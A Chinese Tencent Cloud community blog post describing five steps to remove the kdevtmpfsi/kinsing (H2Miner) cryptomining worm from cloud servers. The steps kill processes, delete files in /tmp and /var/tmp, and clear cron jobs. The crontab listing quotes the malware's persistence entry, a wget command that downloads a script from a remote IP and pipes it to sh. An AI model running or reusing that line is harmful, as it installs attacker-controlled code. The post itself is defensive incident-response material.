前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >Linux【问题记录 02】阿里云+腾讯云服务器的 kdevtmpfsi(H2Miner挖矿蠕虫变种)病毒处理(5个详细步骤)

Linux【问题记录 02】阿里云+腾讯云服务器的 kdevtmpfsi(H2Miner挖矿蠕虫变种)病毒处理(5个详细步骤)

原创
作者头像
yuanzhengme
修改于 2025-06-06 06:44:44
修改于 2025-06-06 06:44:44
890
举报
文章被收录于专栏:LinuxLinux

登录云服务器查看了一下top,发现 kdevtmpfsi 的进程 cup 占用快100%了,腾讯云官方也有相关的 处理方法 腾讯手动清除H2Miner的【2 条建议如下】:

  1. 查找路径为/tmp/kinsing、/tmp/kinsing2、/tmp/kdevtmpfsi的进程,将其kill掉并删除对应的文件;
  2. 查找crontab任务中包含“95.3.146.118”的相关项并删除。

在网络上查看发现中招的朋友不少,详细的处理过程如下【一共 :five: 个步骤】

(1)查看kdevtmpfsi的守护进程kinsing先kill掉【否则kdevtmpfsi进程会不断恢复占用】

代码语言:bash
AI代码解释
复制
[root@aliyun ~]# ps -aux | grep kinsing
[root@aliyun ~]# kill -9 kinsing_pid

(2) 查看kdevtmpfsi的进程并kill掉

代码语言:bash
AI代码解释
复制
[root@aliyun ~]# ps -aux | grep kdevtmpfsi 
[root@aliyun ~]# kill -9 kdevtmpfsi_pid

(3) 删除/tmp/下kdevtmpfsi相关文件

代码语言:bash
AI代码解释
复制
[root@aliyun ~]# cd /tmp/
[root@aliyun tmp]# rm -rf kdevtmpfsi

(4)删除/var/tmp/下kinsing相关文件

代码语言:bash
AI代码解释
复制
[root@aliyun ~]# cd /var/tmp/
[root@aliyun tmp]# rm -rf kinsing

(5)查询并删除定时任务

代码语言:bash
AI代码解释
复制
# 查询
[root@aliyun ~]# crontab -l
* * * * * wget -q -O - http://195.3.146.118/spr.sh | sh > /dev/null 2>&1
# 编辑删除【如果没有在用的其他定时任务可删除全部定时任务 crontab -r】
[root@aliyun ~]# crontab -e

至此,云服务器问题解决【腾讯云也出现了这个病毒,处理方法基本一致】实际上并未彻底解决,后来又出现了,出现之后再次执行一遍即可,现在有一段时间没见到它了~

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
Linux【问题记录 01】腾讯云 cron、sshd 进程CPU占用超95%(亡命徒 Outlaw 僵尸网络攻击)问题排查及处理步骤
从《亡命徒(Outlaw)僵尸网络感染约2万台Linux服务器,腾讯安全提醒企业及时清除》 一文得知 kswapd0 是挖矿程序,tsm 是爆破程序【tsm之前见过,占用率不高,还以为是 TencentSystemManager :angry:】这次没有 tsm 进程了,看来已经爆破成功 :cry:
yuanzhengme
2025/06/06
860
记一次腾讯的云服务器被植入挖矿程序的历程
#最近写了一个小程序,在购买的乞丐版腾讯云服务器上跑起来了tomcat、redis、mysql… #怪事就这样开始了… #先是redis莫名其妙被杀掉… #接下来tomcat也莫名其妙的被杀掉… #redis怎么启动不出10min,他就悄无声息的没了…很神奇,日志也没有被杀掉的记录… #查看oom killer的日志也没有…难道累了自刀了?显然不可能… #我又寻思难道是java里设置的最小空闲连接数量问题?(此时已经进入无脑的瞎蒙状态)显然怎么改依然无济于事…Orz… #凌晨了,此时超级安静的环境下,一股力量让我敲下了
悟空宇
2024/03/11
3710
记一次腾讯的云服务器被植入挖矿程序的历程
Linux 中挖矿病毒处理过程
进程占CPU 700%,进程名字是类似XY2Arv的6位随机大小写字母+数字的字符串。最终发现是一个叫systemd或trump的病毒,是一个挖矿的病毒,在挖一种叫门罗币(XMR)的数字货币。
全栈程序员站长
2022/08/30
2.4K0
清理Redis病毒程序kdevtmpfsi
一个redis 程序占用cpu 46%,虽然redis-server 有定时清理过期的键,但也不会占用这么高的CPU吧,一般都是0.3% 看看这个进程什么鬼 systemctl status 14561 然后找到了它的父亲进程
崔笑颜
2020/06/08
1K0
Linux【问题记录 03】阿里云+腾讯云服务器挖矿木马 kthreaddk 处理记录+云服务器使用建议
有一段时间没有登录云服务器了,心里想着看看服务器有没有被木马占领,好巧不巧,阿里云和腾讯云都被占领了,更巧的是,都是 kthreaddk 进程,首先想到的是百度一下看看有没有解决办法,网上似乎只有 kthreaddi 相关的说明而且无法解决问题,之前处理过 kdevtmpfsi(H2Miner挖矿蠕虫变种)病毒所以有了一些思路。
yuanzhengme
2025/06/06
1130
记一次Linux挖矿病毒的清除
起因是同学过年期间因阿里云的服务器Redis弱口令(好像是没设密码)被提权植入了挖矿病毒,CPU长期占用100%。
xuing
2019/10/19
10.8K2
linux 中了挖矿病毒
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/133160.html原文链接:https://javaforall.cn
全栈程序员站长
2022/06/27
2.3K0
linux 中了挖矿病毒
挖矿病毒 kdevtmpfsi 处理--实操
服务器CPU资源使用一直处于100%的状态,通过 top 命令查看,发现可疑进程 kdevtmpfsi。通过 google搜索,发现这是挖矿病毒。
OwenZhang
2022/01/05
2.8K2
挖矿病毒 kdevtmpfsi 处理--实操
Linux被kdevtmpfsi 挖矿病毒入侵[通俗易懂]
先上阿里云上的报警信息。有个最大的问题是:top命令查看自己服务器CPU运行情况,会发现kdevtmpfsi的进程,CPU使用率为100%,第一次删除干净了kdevtmpfsi程序,没曾想几分钟以后,就出现了第二个警告。使用netstat -antp命令查看端口使用情况,又出现了kdevtmpfsi如图三所示
全栈程序员站长
2022/09/02
3.3K0
Linux被kdevtmpfsi 挖矿病毒入侵[通俗易懂]
kdevtmpfsi病毒进程(挖矿)导致CPU过高
2. 此病毒一般会又定时任务脚本。使用crontab -l 查看定时任务编辑并删除该任务(标红的一行)。
硅谷子
2020/11/24
2.3K0
kdevtmpfsi病毒进程(挖矿)导致CPU过高
从一段挖矿病毒代码看Linux命令的实际应用
最近做易生信培训时新购了一块阿里云,用于演示分析流程搭建和配置。短期使用,上面没有数据,也没做什么防范,结果不曾想,被挖矿病毒盯上了,给了一个近距离接触病毒的机会。
生信宝典
2019/07/12
6.7K1
从一段挖矿病毒代码看Linux命令的实际应用
腾讯云-服务违规封禁提醒解决
博主在因为获取知识的需求,开通腾讯云-轻量云服务器,在日常使用中没有什么问题,但是最近一直频繁收到邮件提醒,之前也没有想着去解决这个问题,今天又收到,就来解决了一下相关问题。
何其不顾四月天
2023/03/10
4.6K0
挖矿木马自助清理手册
挖矿木马会占用CPU进行超频运算,从而占用主机大量的CPU资源,严重影响服务器上的其他应用的正常运行。黑客为了得到更多的算力资源,一般都会对全网进行无差别扫描,同时利用SSH爆破和漏洞利用等手段攻击主机。部分挖矿木马还具备蠕虫化的特点,在主机被成功入侵之后,挖矿木马还会向内网渗透,并在被入侵的服务器上持久化驻留以获取最大收益。整体的攻击流程大致如下图所示:
purnus
2021/06/12
53.4K24
挖矿木马自助清理手册
kworkerds 挖矿木马简单分析及清理
公司之前的开发和测试环境是在腾讯云上,部分服务器中过一次挖矿木马 kworkerds,本文为我当时分析和清理木马的记录,希望能对大家有所帮助。
叨叨软件测试
2020/04/14
1.6K0
挖矿病毒处理记录「建议收藏」
看看是否登录了我的帐号,我在这两个文件中没有发现我不认识的IP,于是我就放过了这两个文件。
全栈程序员站长
2022/09/06
5310
挖矿病毒处理记录「建议收藏」
记一次云服务器中招排查的过程
相信有很多人和我一样,花钱养着一个性能尚可的云服务器,但是却啥都没有部署,总想着什么时候能够大展宏图,部署个网站或者 API 啥的。但是理想很丰满,现实就太骨感,期待的网站和 API 没有到来,来的却是无情的挖矿程序!
周萝卜
2020/10/30
6860
记一次云服务器中招排查的过程
Linux 遭入侵,挖矿进程被隐藏排查记录
今天来给大家分享下这两天遇到的一个问题,服务器被挖矿了,把我的排查记录分享下,希望能帮到有需要的同学。
程序员同行者
2019/03/20
8.3K0
Linux 遭入侵,挖矿进程被隐藏排查记录
记一次服务器被当肉鸡挖矿的经历
看样子像是服务器被挂马了,首先应该检查服务器是否有可疑的定时任务。使用crontab -l命令来查看当前的服务器的定时任务。经检查后发现并无异常,只能看下这个进程的具体信息了。
程序员小猿
2021/01/19
3.9K0
记一次服务器被当肉鸡挖矿的经历
公网的Redis还敢不设置密码?我看你是疯了
朋友们,我有一台华为云耀服务器,闲来无事,在上面装了个redis,做一些测试研究,结果被攻击了,这还是头一回遇见,因为以前的环境还是使用内网居多。
用户6256742
2024/06/30
2690
公网的Redis还敢不设置密码?我看你是疯了
Redis被黑客攻击,挟持为挖矿程序
由于我这边服务器是非常低配置的,经常操作一下就会引起某些进程重启的情况,于是我怀疑是持久化出问题了
名字是乱打的
2022/04/24
8740
推荐阅读
相关推荐
Linux【问题记录 01】腾讯云 cron、sshd 进程CPU占用超95%(亡命徒 Outlaw 僵尸网络攻击)问题排查及处理步骤
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档